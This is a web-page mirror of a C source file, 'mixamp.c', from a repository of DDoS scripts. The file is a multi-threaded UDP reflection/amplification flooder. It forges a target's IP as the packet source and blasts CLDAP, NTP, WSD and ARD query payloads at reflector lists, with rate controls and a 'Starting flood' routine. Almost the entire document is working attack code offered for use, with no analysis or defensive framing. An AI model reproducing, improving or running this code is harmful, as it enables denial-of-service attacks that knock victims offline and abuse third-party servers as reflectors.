Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
R00tS3c
GitHub Repository: R00tS3c/DDOS-RootSec
 Path: blob/master/DDOS Scripts/L4/UDP/mixamp.c
4607 views
1
/***********************************************************************************************************

2
*

3
* @Project: MIX Amp

4
* @Author: Machiavel

5
* @Features: Sending UDP-based amplification attacks randomly. CLDAP, NTP, WSD, ARD.

6
*

7
***********************************************************************************************************/

8
#include <time.h>

9
#include <pthread.h>

10
#include <unistd.h>

11
#include <stdio.h>

12
#include <stdlib.h>

13
#include <string.h>

14
#include <sys/socket.h>

15
#include <netinet/ip.h>

16
#include <netinet/udp.h>

17
#include <arpa/inet.h>

18
#define MAX_PACKET_SIZE 8192

19
#define PHI 0x9e3779b9

20
static uint32_t Q[4096], c = 362436;

21
struct list

22
{

23
	struct sockaddr_in data;

24
	struct list *next;

25
	struct list *prev;

26
};

27
struct list *head;

28
volatile int limiter;

29
volatile unsigned int pps;

30
volatile unsigned int sleeptime = 100;

31
struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };

32
void init_rand(uint32_t x)

33
{

34
	int i;

35
	Q[0] = x;

36
	Q[1] = x + PHI;

37
	Q[2] = x + PHI + PHI;

38
	for (i = 3; i < 4096; i++)

39
	{

40
	Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;

41
	}

42
}

43
uint32_t rand_cmwc(void)

44
{

45
	uint64_t t, a = 18782LL;

46
	static uint32_t i = 4095;

47
	uint32_t x, r = 0xfffffffe;

48
	i = (i + 1) & 4095;

49
	t = a * Q[i] + c;

50
	c = (t >> 32);

51
	x = t + c;

52
	if (x < c) {

53
	x++;

54
	c++;

55
	}

56
	return (Q[i] = r - x);

57
}

58
unsigned short csum (unsigned short *buf, int nwords)

59
{

60
	unsigned long sum = 0;

61
	for (sum = 0; nwords > 0; nwords--)

62
	sum += *buf++;

63
	sum = (sum >> 16) + (sum & 0xffff);

64
	sum += (sum >> 16);

65
	return (unsigned short)(~sum);

66
}

67
char * mixAMP_protocol(){

68
	while(1){

69
		char *protocol[4];

70
		protocol[0] = "ldap.txt";

71
    	protocol[1] = "ntp.txt";

72
		protocol[2] = "wsd.txt";

73
		protocol[3] = "ard.txt";

74
		return protocol[rand()%4+0];

75
	}

76
}

77
void *mixAMP_setup(void *par1)

78
{

79
	struct thread_data *td = (struct thread_data *)par1;

80
	char datagram[MAX_PACKET_SIZE];

81
	struct iphdr *iph = (struct iphdr *)datagram;

82
	struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);

83
	struct sockaddr_in sin = td->sin;

84
	struct  list *list_node = td->list_node;

85
	

86
	int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);

87
	if(s < 0){

88
	fprintf(stderr, "Could not open raw socket.\n");

89
	exit(-1);

90
	}

91
	init_rand(time(NULL));

92
	memset(datagram, 0, MAX_PACKET_SIZE);

93
	iph->ihl = 5;

94
	iph->version = 4;

95
	iph->tos = 0;

96
	iph->id = htonl(rand()%13370+1);

97
	iph->frag_off = 0;

98
	iph->ttl = MAXTTL;

99
	iph->protocol = IPPROTO_UDP;

100
	iph->check = 0;

101
	iph->saddr = inet_addr("192.168.3.100");

102
	udph->source = htons(rand()%13370+80);

103
	udph->check = 0;

104
	iph->saddr = sin.sin_addr.s_addr;

105
	iph->daddr = list_node->data.sin_addr.s_addr;

106
	iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);

107
	if(mixAMP_protocol() == "ldap.txt"){

108
		memcpy((void *)udph + sizeof(struct udphdr), "\x30\x84\x00\x00\x00\x2d\x02\x01\x07\x63\x84\x00\x00\x00\x24\x04\x00\x0a\x01\x00\x0a\x01\x00\x02\x01\x00\x02\x01\x64\x01\x01\x00\x87\x0b\x6f\x62\x6a\x65\x63\x74\x43\x6c\x61\x73\x73\x30\x84\x00\x00\x00\x00", 51);

109
        udph->len=htons(sizeof(struct udphdr) + 51);

110
		udph->dest = htons(389);

111
        iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 51;

112
	}

113
	if(mixAMP_protocol() == "ntp.txt"){

114
		memcpy((void *)udph + sizeof(struct udphdr), "\x17\x00\x03\x2a\x00\x00\x00\x00", 8);

115
        udph->len=htons(sizeof(struct udphdr) + 8);

116
		udph->dest = htons(123);

117
        iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 8;

118
	}

119
	if(mixAMP_protocol() == "wsd.txt"){

120
		memcpy((void *)udph + sizeof(struct udphdr), "<:/>", 4);

121
        udph->len=htons(sizeof(struct udphdr) + 4);

122
		udph->dest = htons(3702);

123
        iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 4;

124
	}

125
	if(mixAMP_protocol() == "ard.txt"){

126
		memcpy((void *)udph + sizeof(struct udphdr), "\0\x14\0\x01\x03", 5);

127
        udph->len=htons(sizeof(struct udphdr) + 5);

128
		udph->dest = htons(3283);

129
        iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 5;

130
	}

131
	int tmp = 1;

132
	const int *val = &tmp;

133
	if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){

134
	fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");

135
	exit(-1);

136
	}

137
	init_rand(time(NULL));

138
	register unsigned int i;

139
	i = 0;

140
	while(1){

141
		sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));

142
		list_node = list_node->next;

143
		iph->daddr = list_node->data.sin_addr.s_addr;

144
		iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);

145
		iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);

146
		pps++;

147
		if(i >= limiter)

148
		{

149
			i = 0;

150
			usleep(sleeptime);

151
		}

152
		i++;

153
	}

154
}

155


156
int main(int argc, char *argv[ ])

157
{

158
	if(argc < 5){

159
	fprintf(stderr, "UDP AMP Mix - Undisclosed.to\n");

160
	fprintf(stdout, "Usage: %s <target IP> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);

161
		exit(-1);

162
	}

163
	srand(time(NULL));

164
	int i = 0;

165
	head = NULL;

166
	fprintf(stdout, "Setting up sockets...\n");

167
	int max_len = 128;

168
	char *buffer = (char *) malloc(max_len);

169
	buffer = memset(buffer, 0x00, max_len);

170
	int num_threads = atoi(argv[2]);

171
	int maxpps = atoi(argv[3]);

172
	limiter = 0;

173
	pps = 0;

174
	int multiplier = 20;

175
	FILE *list_fd = fopen(mixAMP_protocol(),  "r");

176
	while (fgets(buffer, max_len, list_fd) != NULL) {

177
		if ((buffer[strlen(buffer) - 1] == '\n') ||

178
				(buffer[strlen(buffer) - 1] == '\r')) {

179
			buffer[strlen(buffer) - 1] = 0x00;

180
			if(head == NULL)

181
			{

182
				head = (struct list *)malloc(sizeof(struct list));

183
				bzero(&head->data, sizeof(head->data));

184
				head->data.sin_addr.s_addr=inet_addr(buffer);

185
				head->next = head;

186
				head->prev = head;

187
			} else {

188
				struct list *new_node = (struct list *)malloc(sizeof(struct list));

189
				memset(new_node, 0x00, sizeof(struct list));

190
				new_node->data.sin_addr.s_addr=inet_addr(buffer);

191
				new_node->prev = head;

192
				new_node->next = head->next;

193
				head->next = new_node;

194
			}

195
			i++;

196
		} else {

197
			continue;

198
		}

199
	}

200
	struct list *current = head->next;

201
	struct sockaddr_in sin;

202
	pthread_t thread[num_threads];

203
	sin.sin_family = AF_INET;

204
	sin.sin_addr.s_addr = inet_addr(argv[1]);

205
	struct thread_data td[num_threads];

206
	for(i = 0;i<num_threads;i++){

207
		td[i].thread_id = i;

208
		td[i].sin= sin;

209
		td[i].list_node = current;

210
		pthread_create( &thread[i], NULL, &mixAMP_setup, (void *) &td[i]);

211
	}

212
	fprintf(stdout, "Starting flood...\n");

213
	for(i = 0;i<(atoi(argv[4])*multiplier);i++)

214
	{

215
		usleep((1000/multiplier)*1000);

216
		if((pps*multiplier) > maxpps)

217
		{

218
			if(1 > limiter)

219
			{

220
				sleeptime+=100;

221
			} else {

222
				limiter--;

223
			}

224
		} else {

225
			limiter++;

226
			if(sleeptime > 25)

227
			{

228
				sleeptime-=25;

229
			} else {

230
				sleeptime = 0;

231
			}

232
		}

233
		pps = 0;

234
	}

235
	return 0;

236
}

237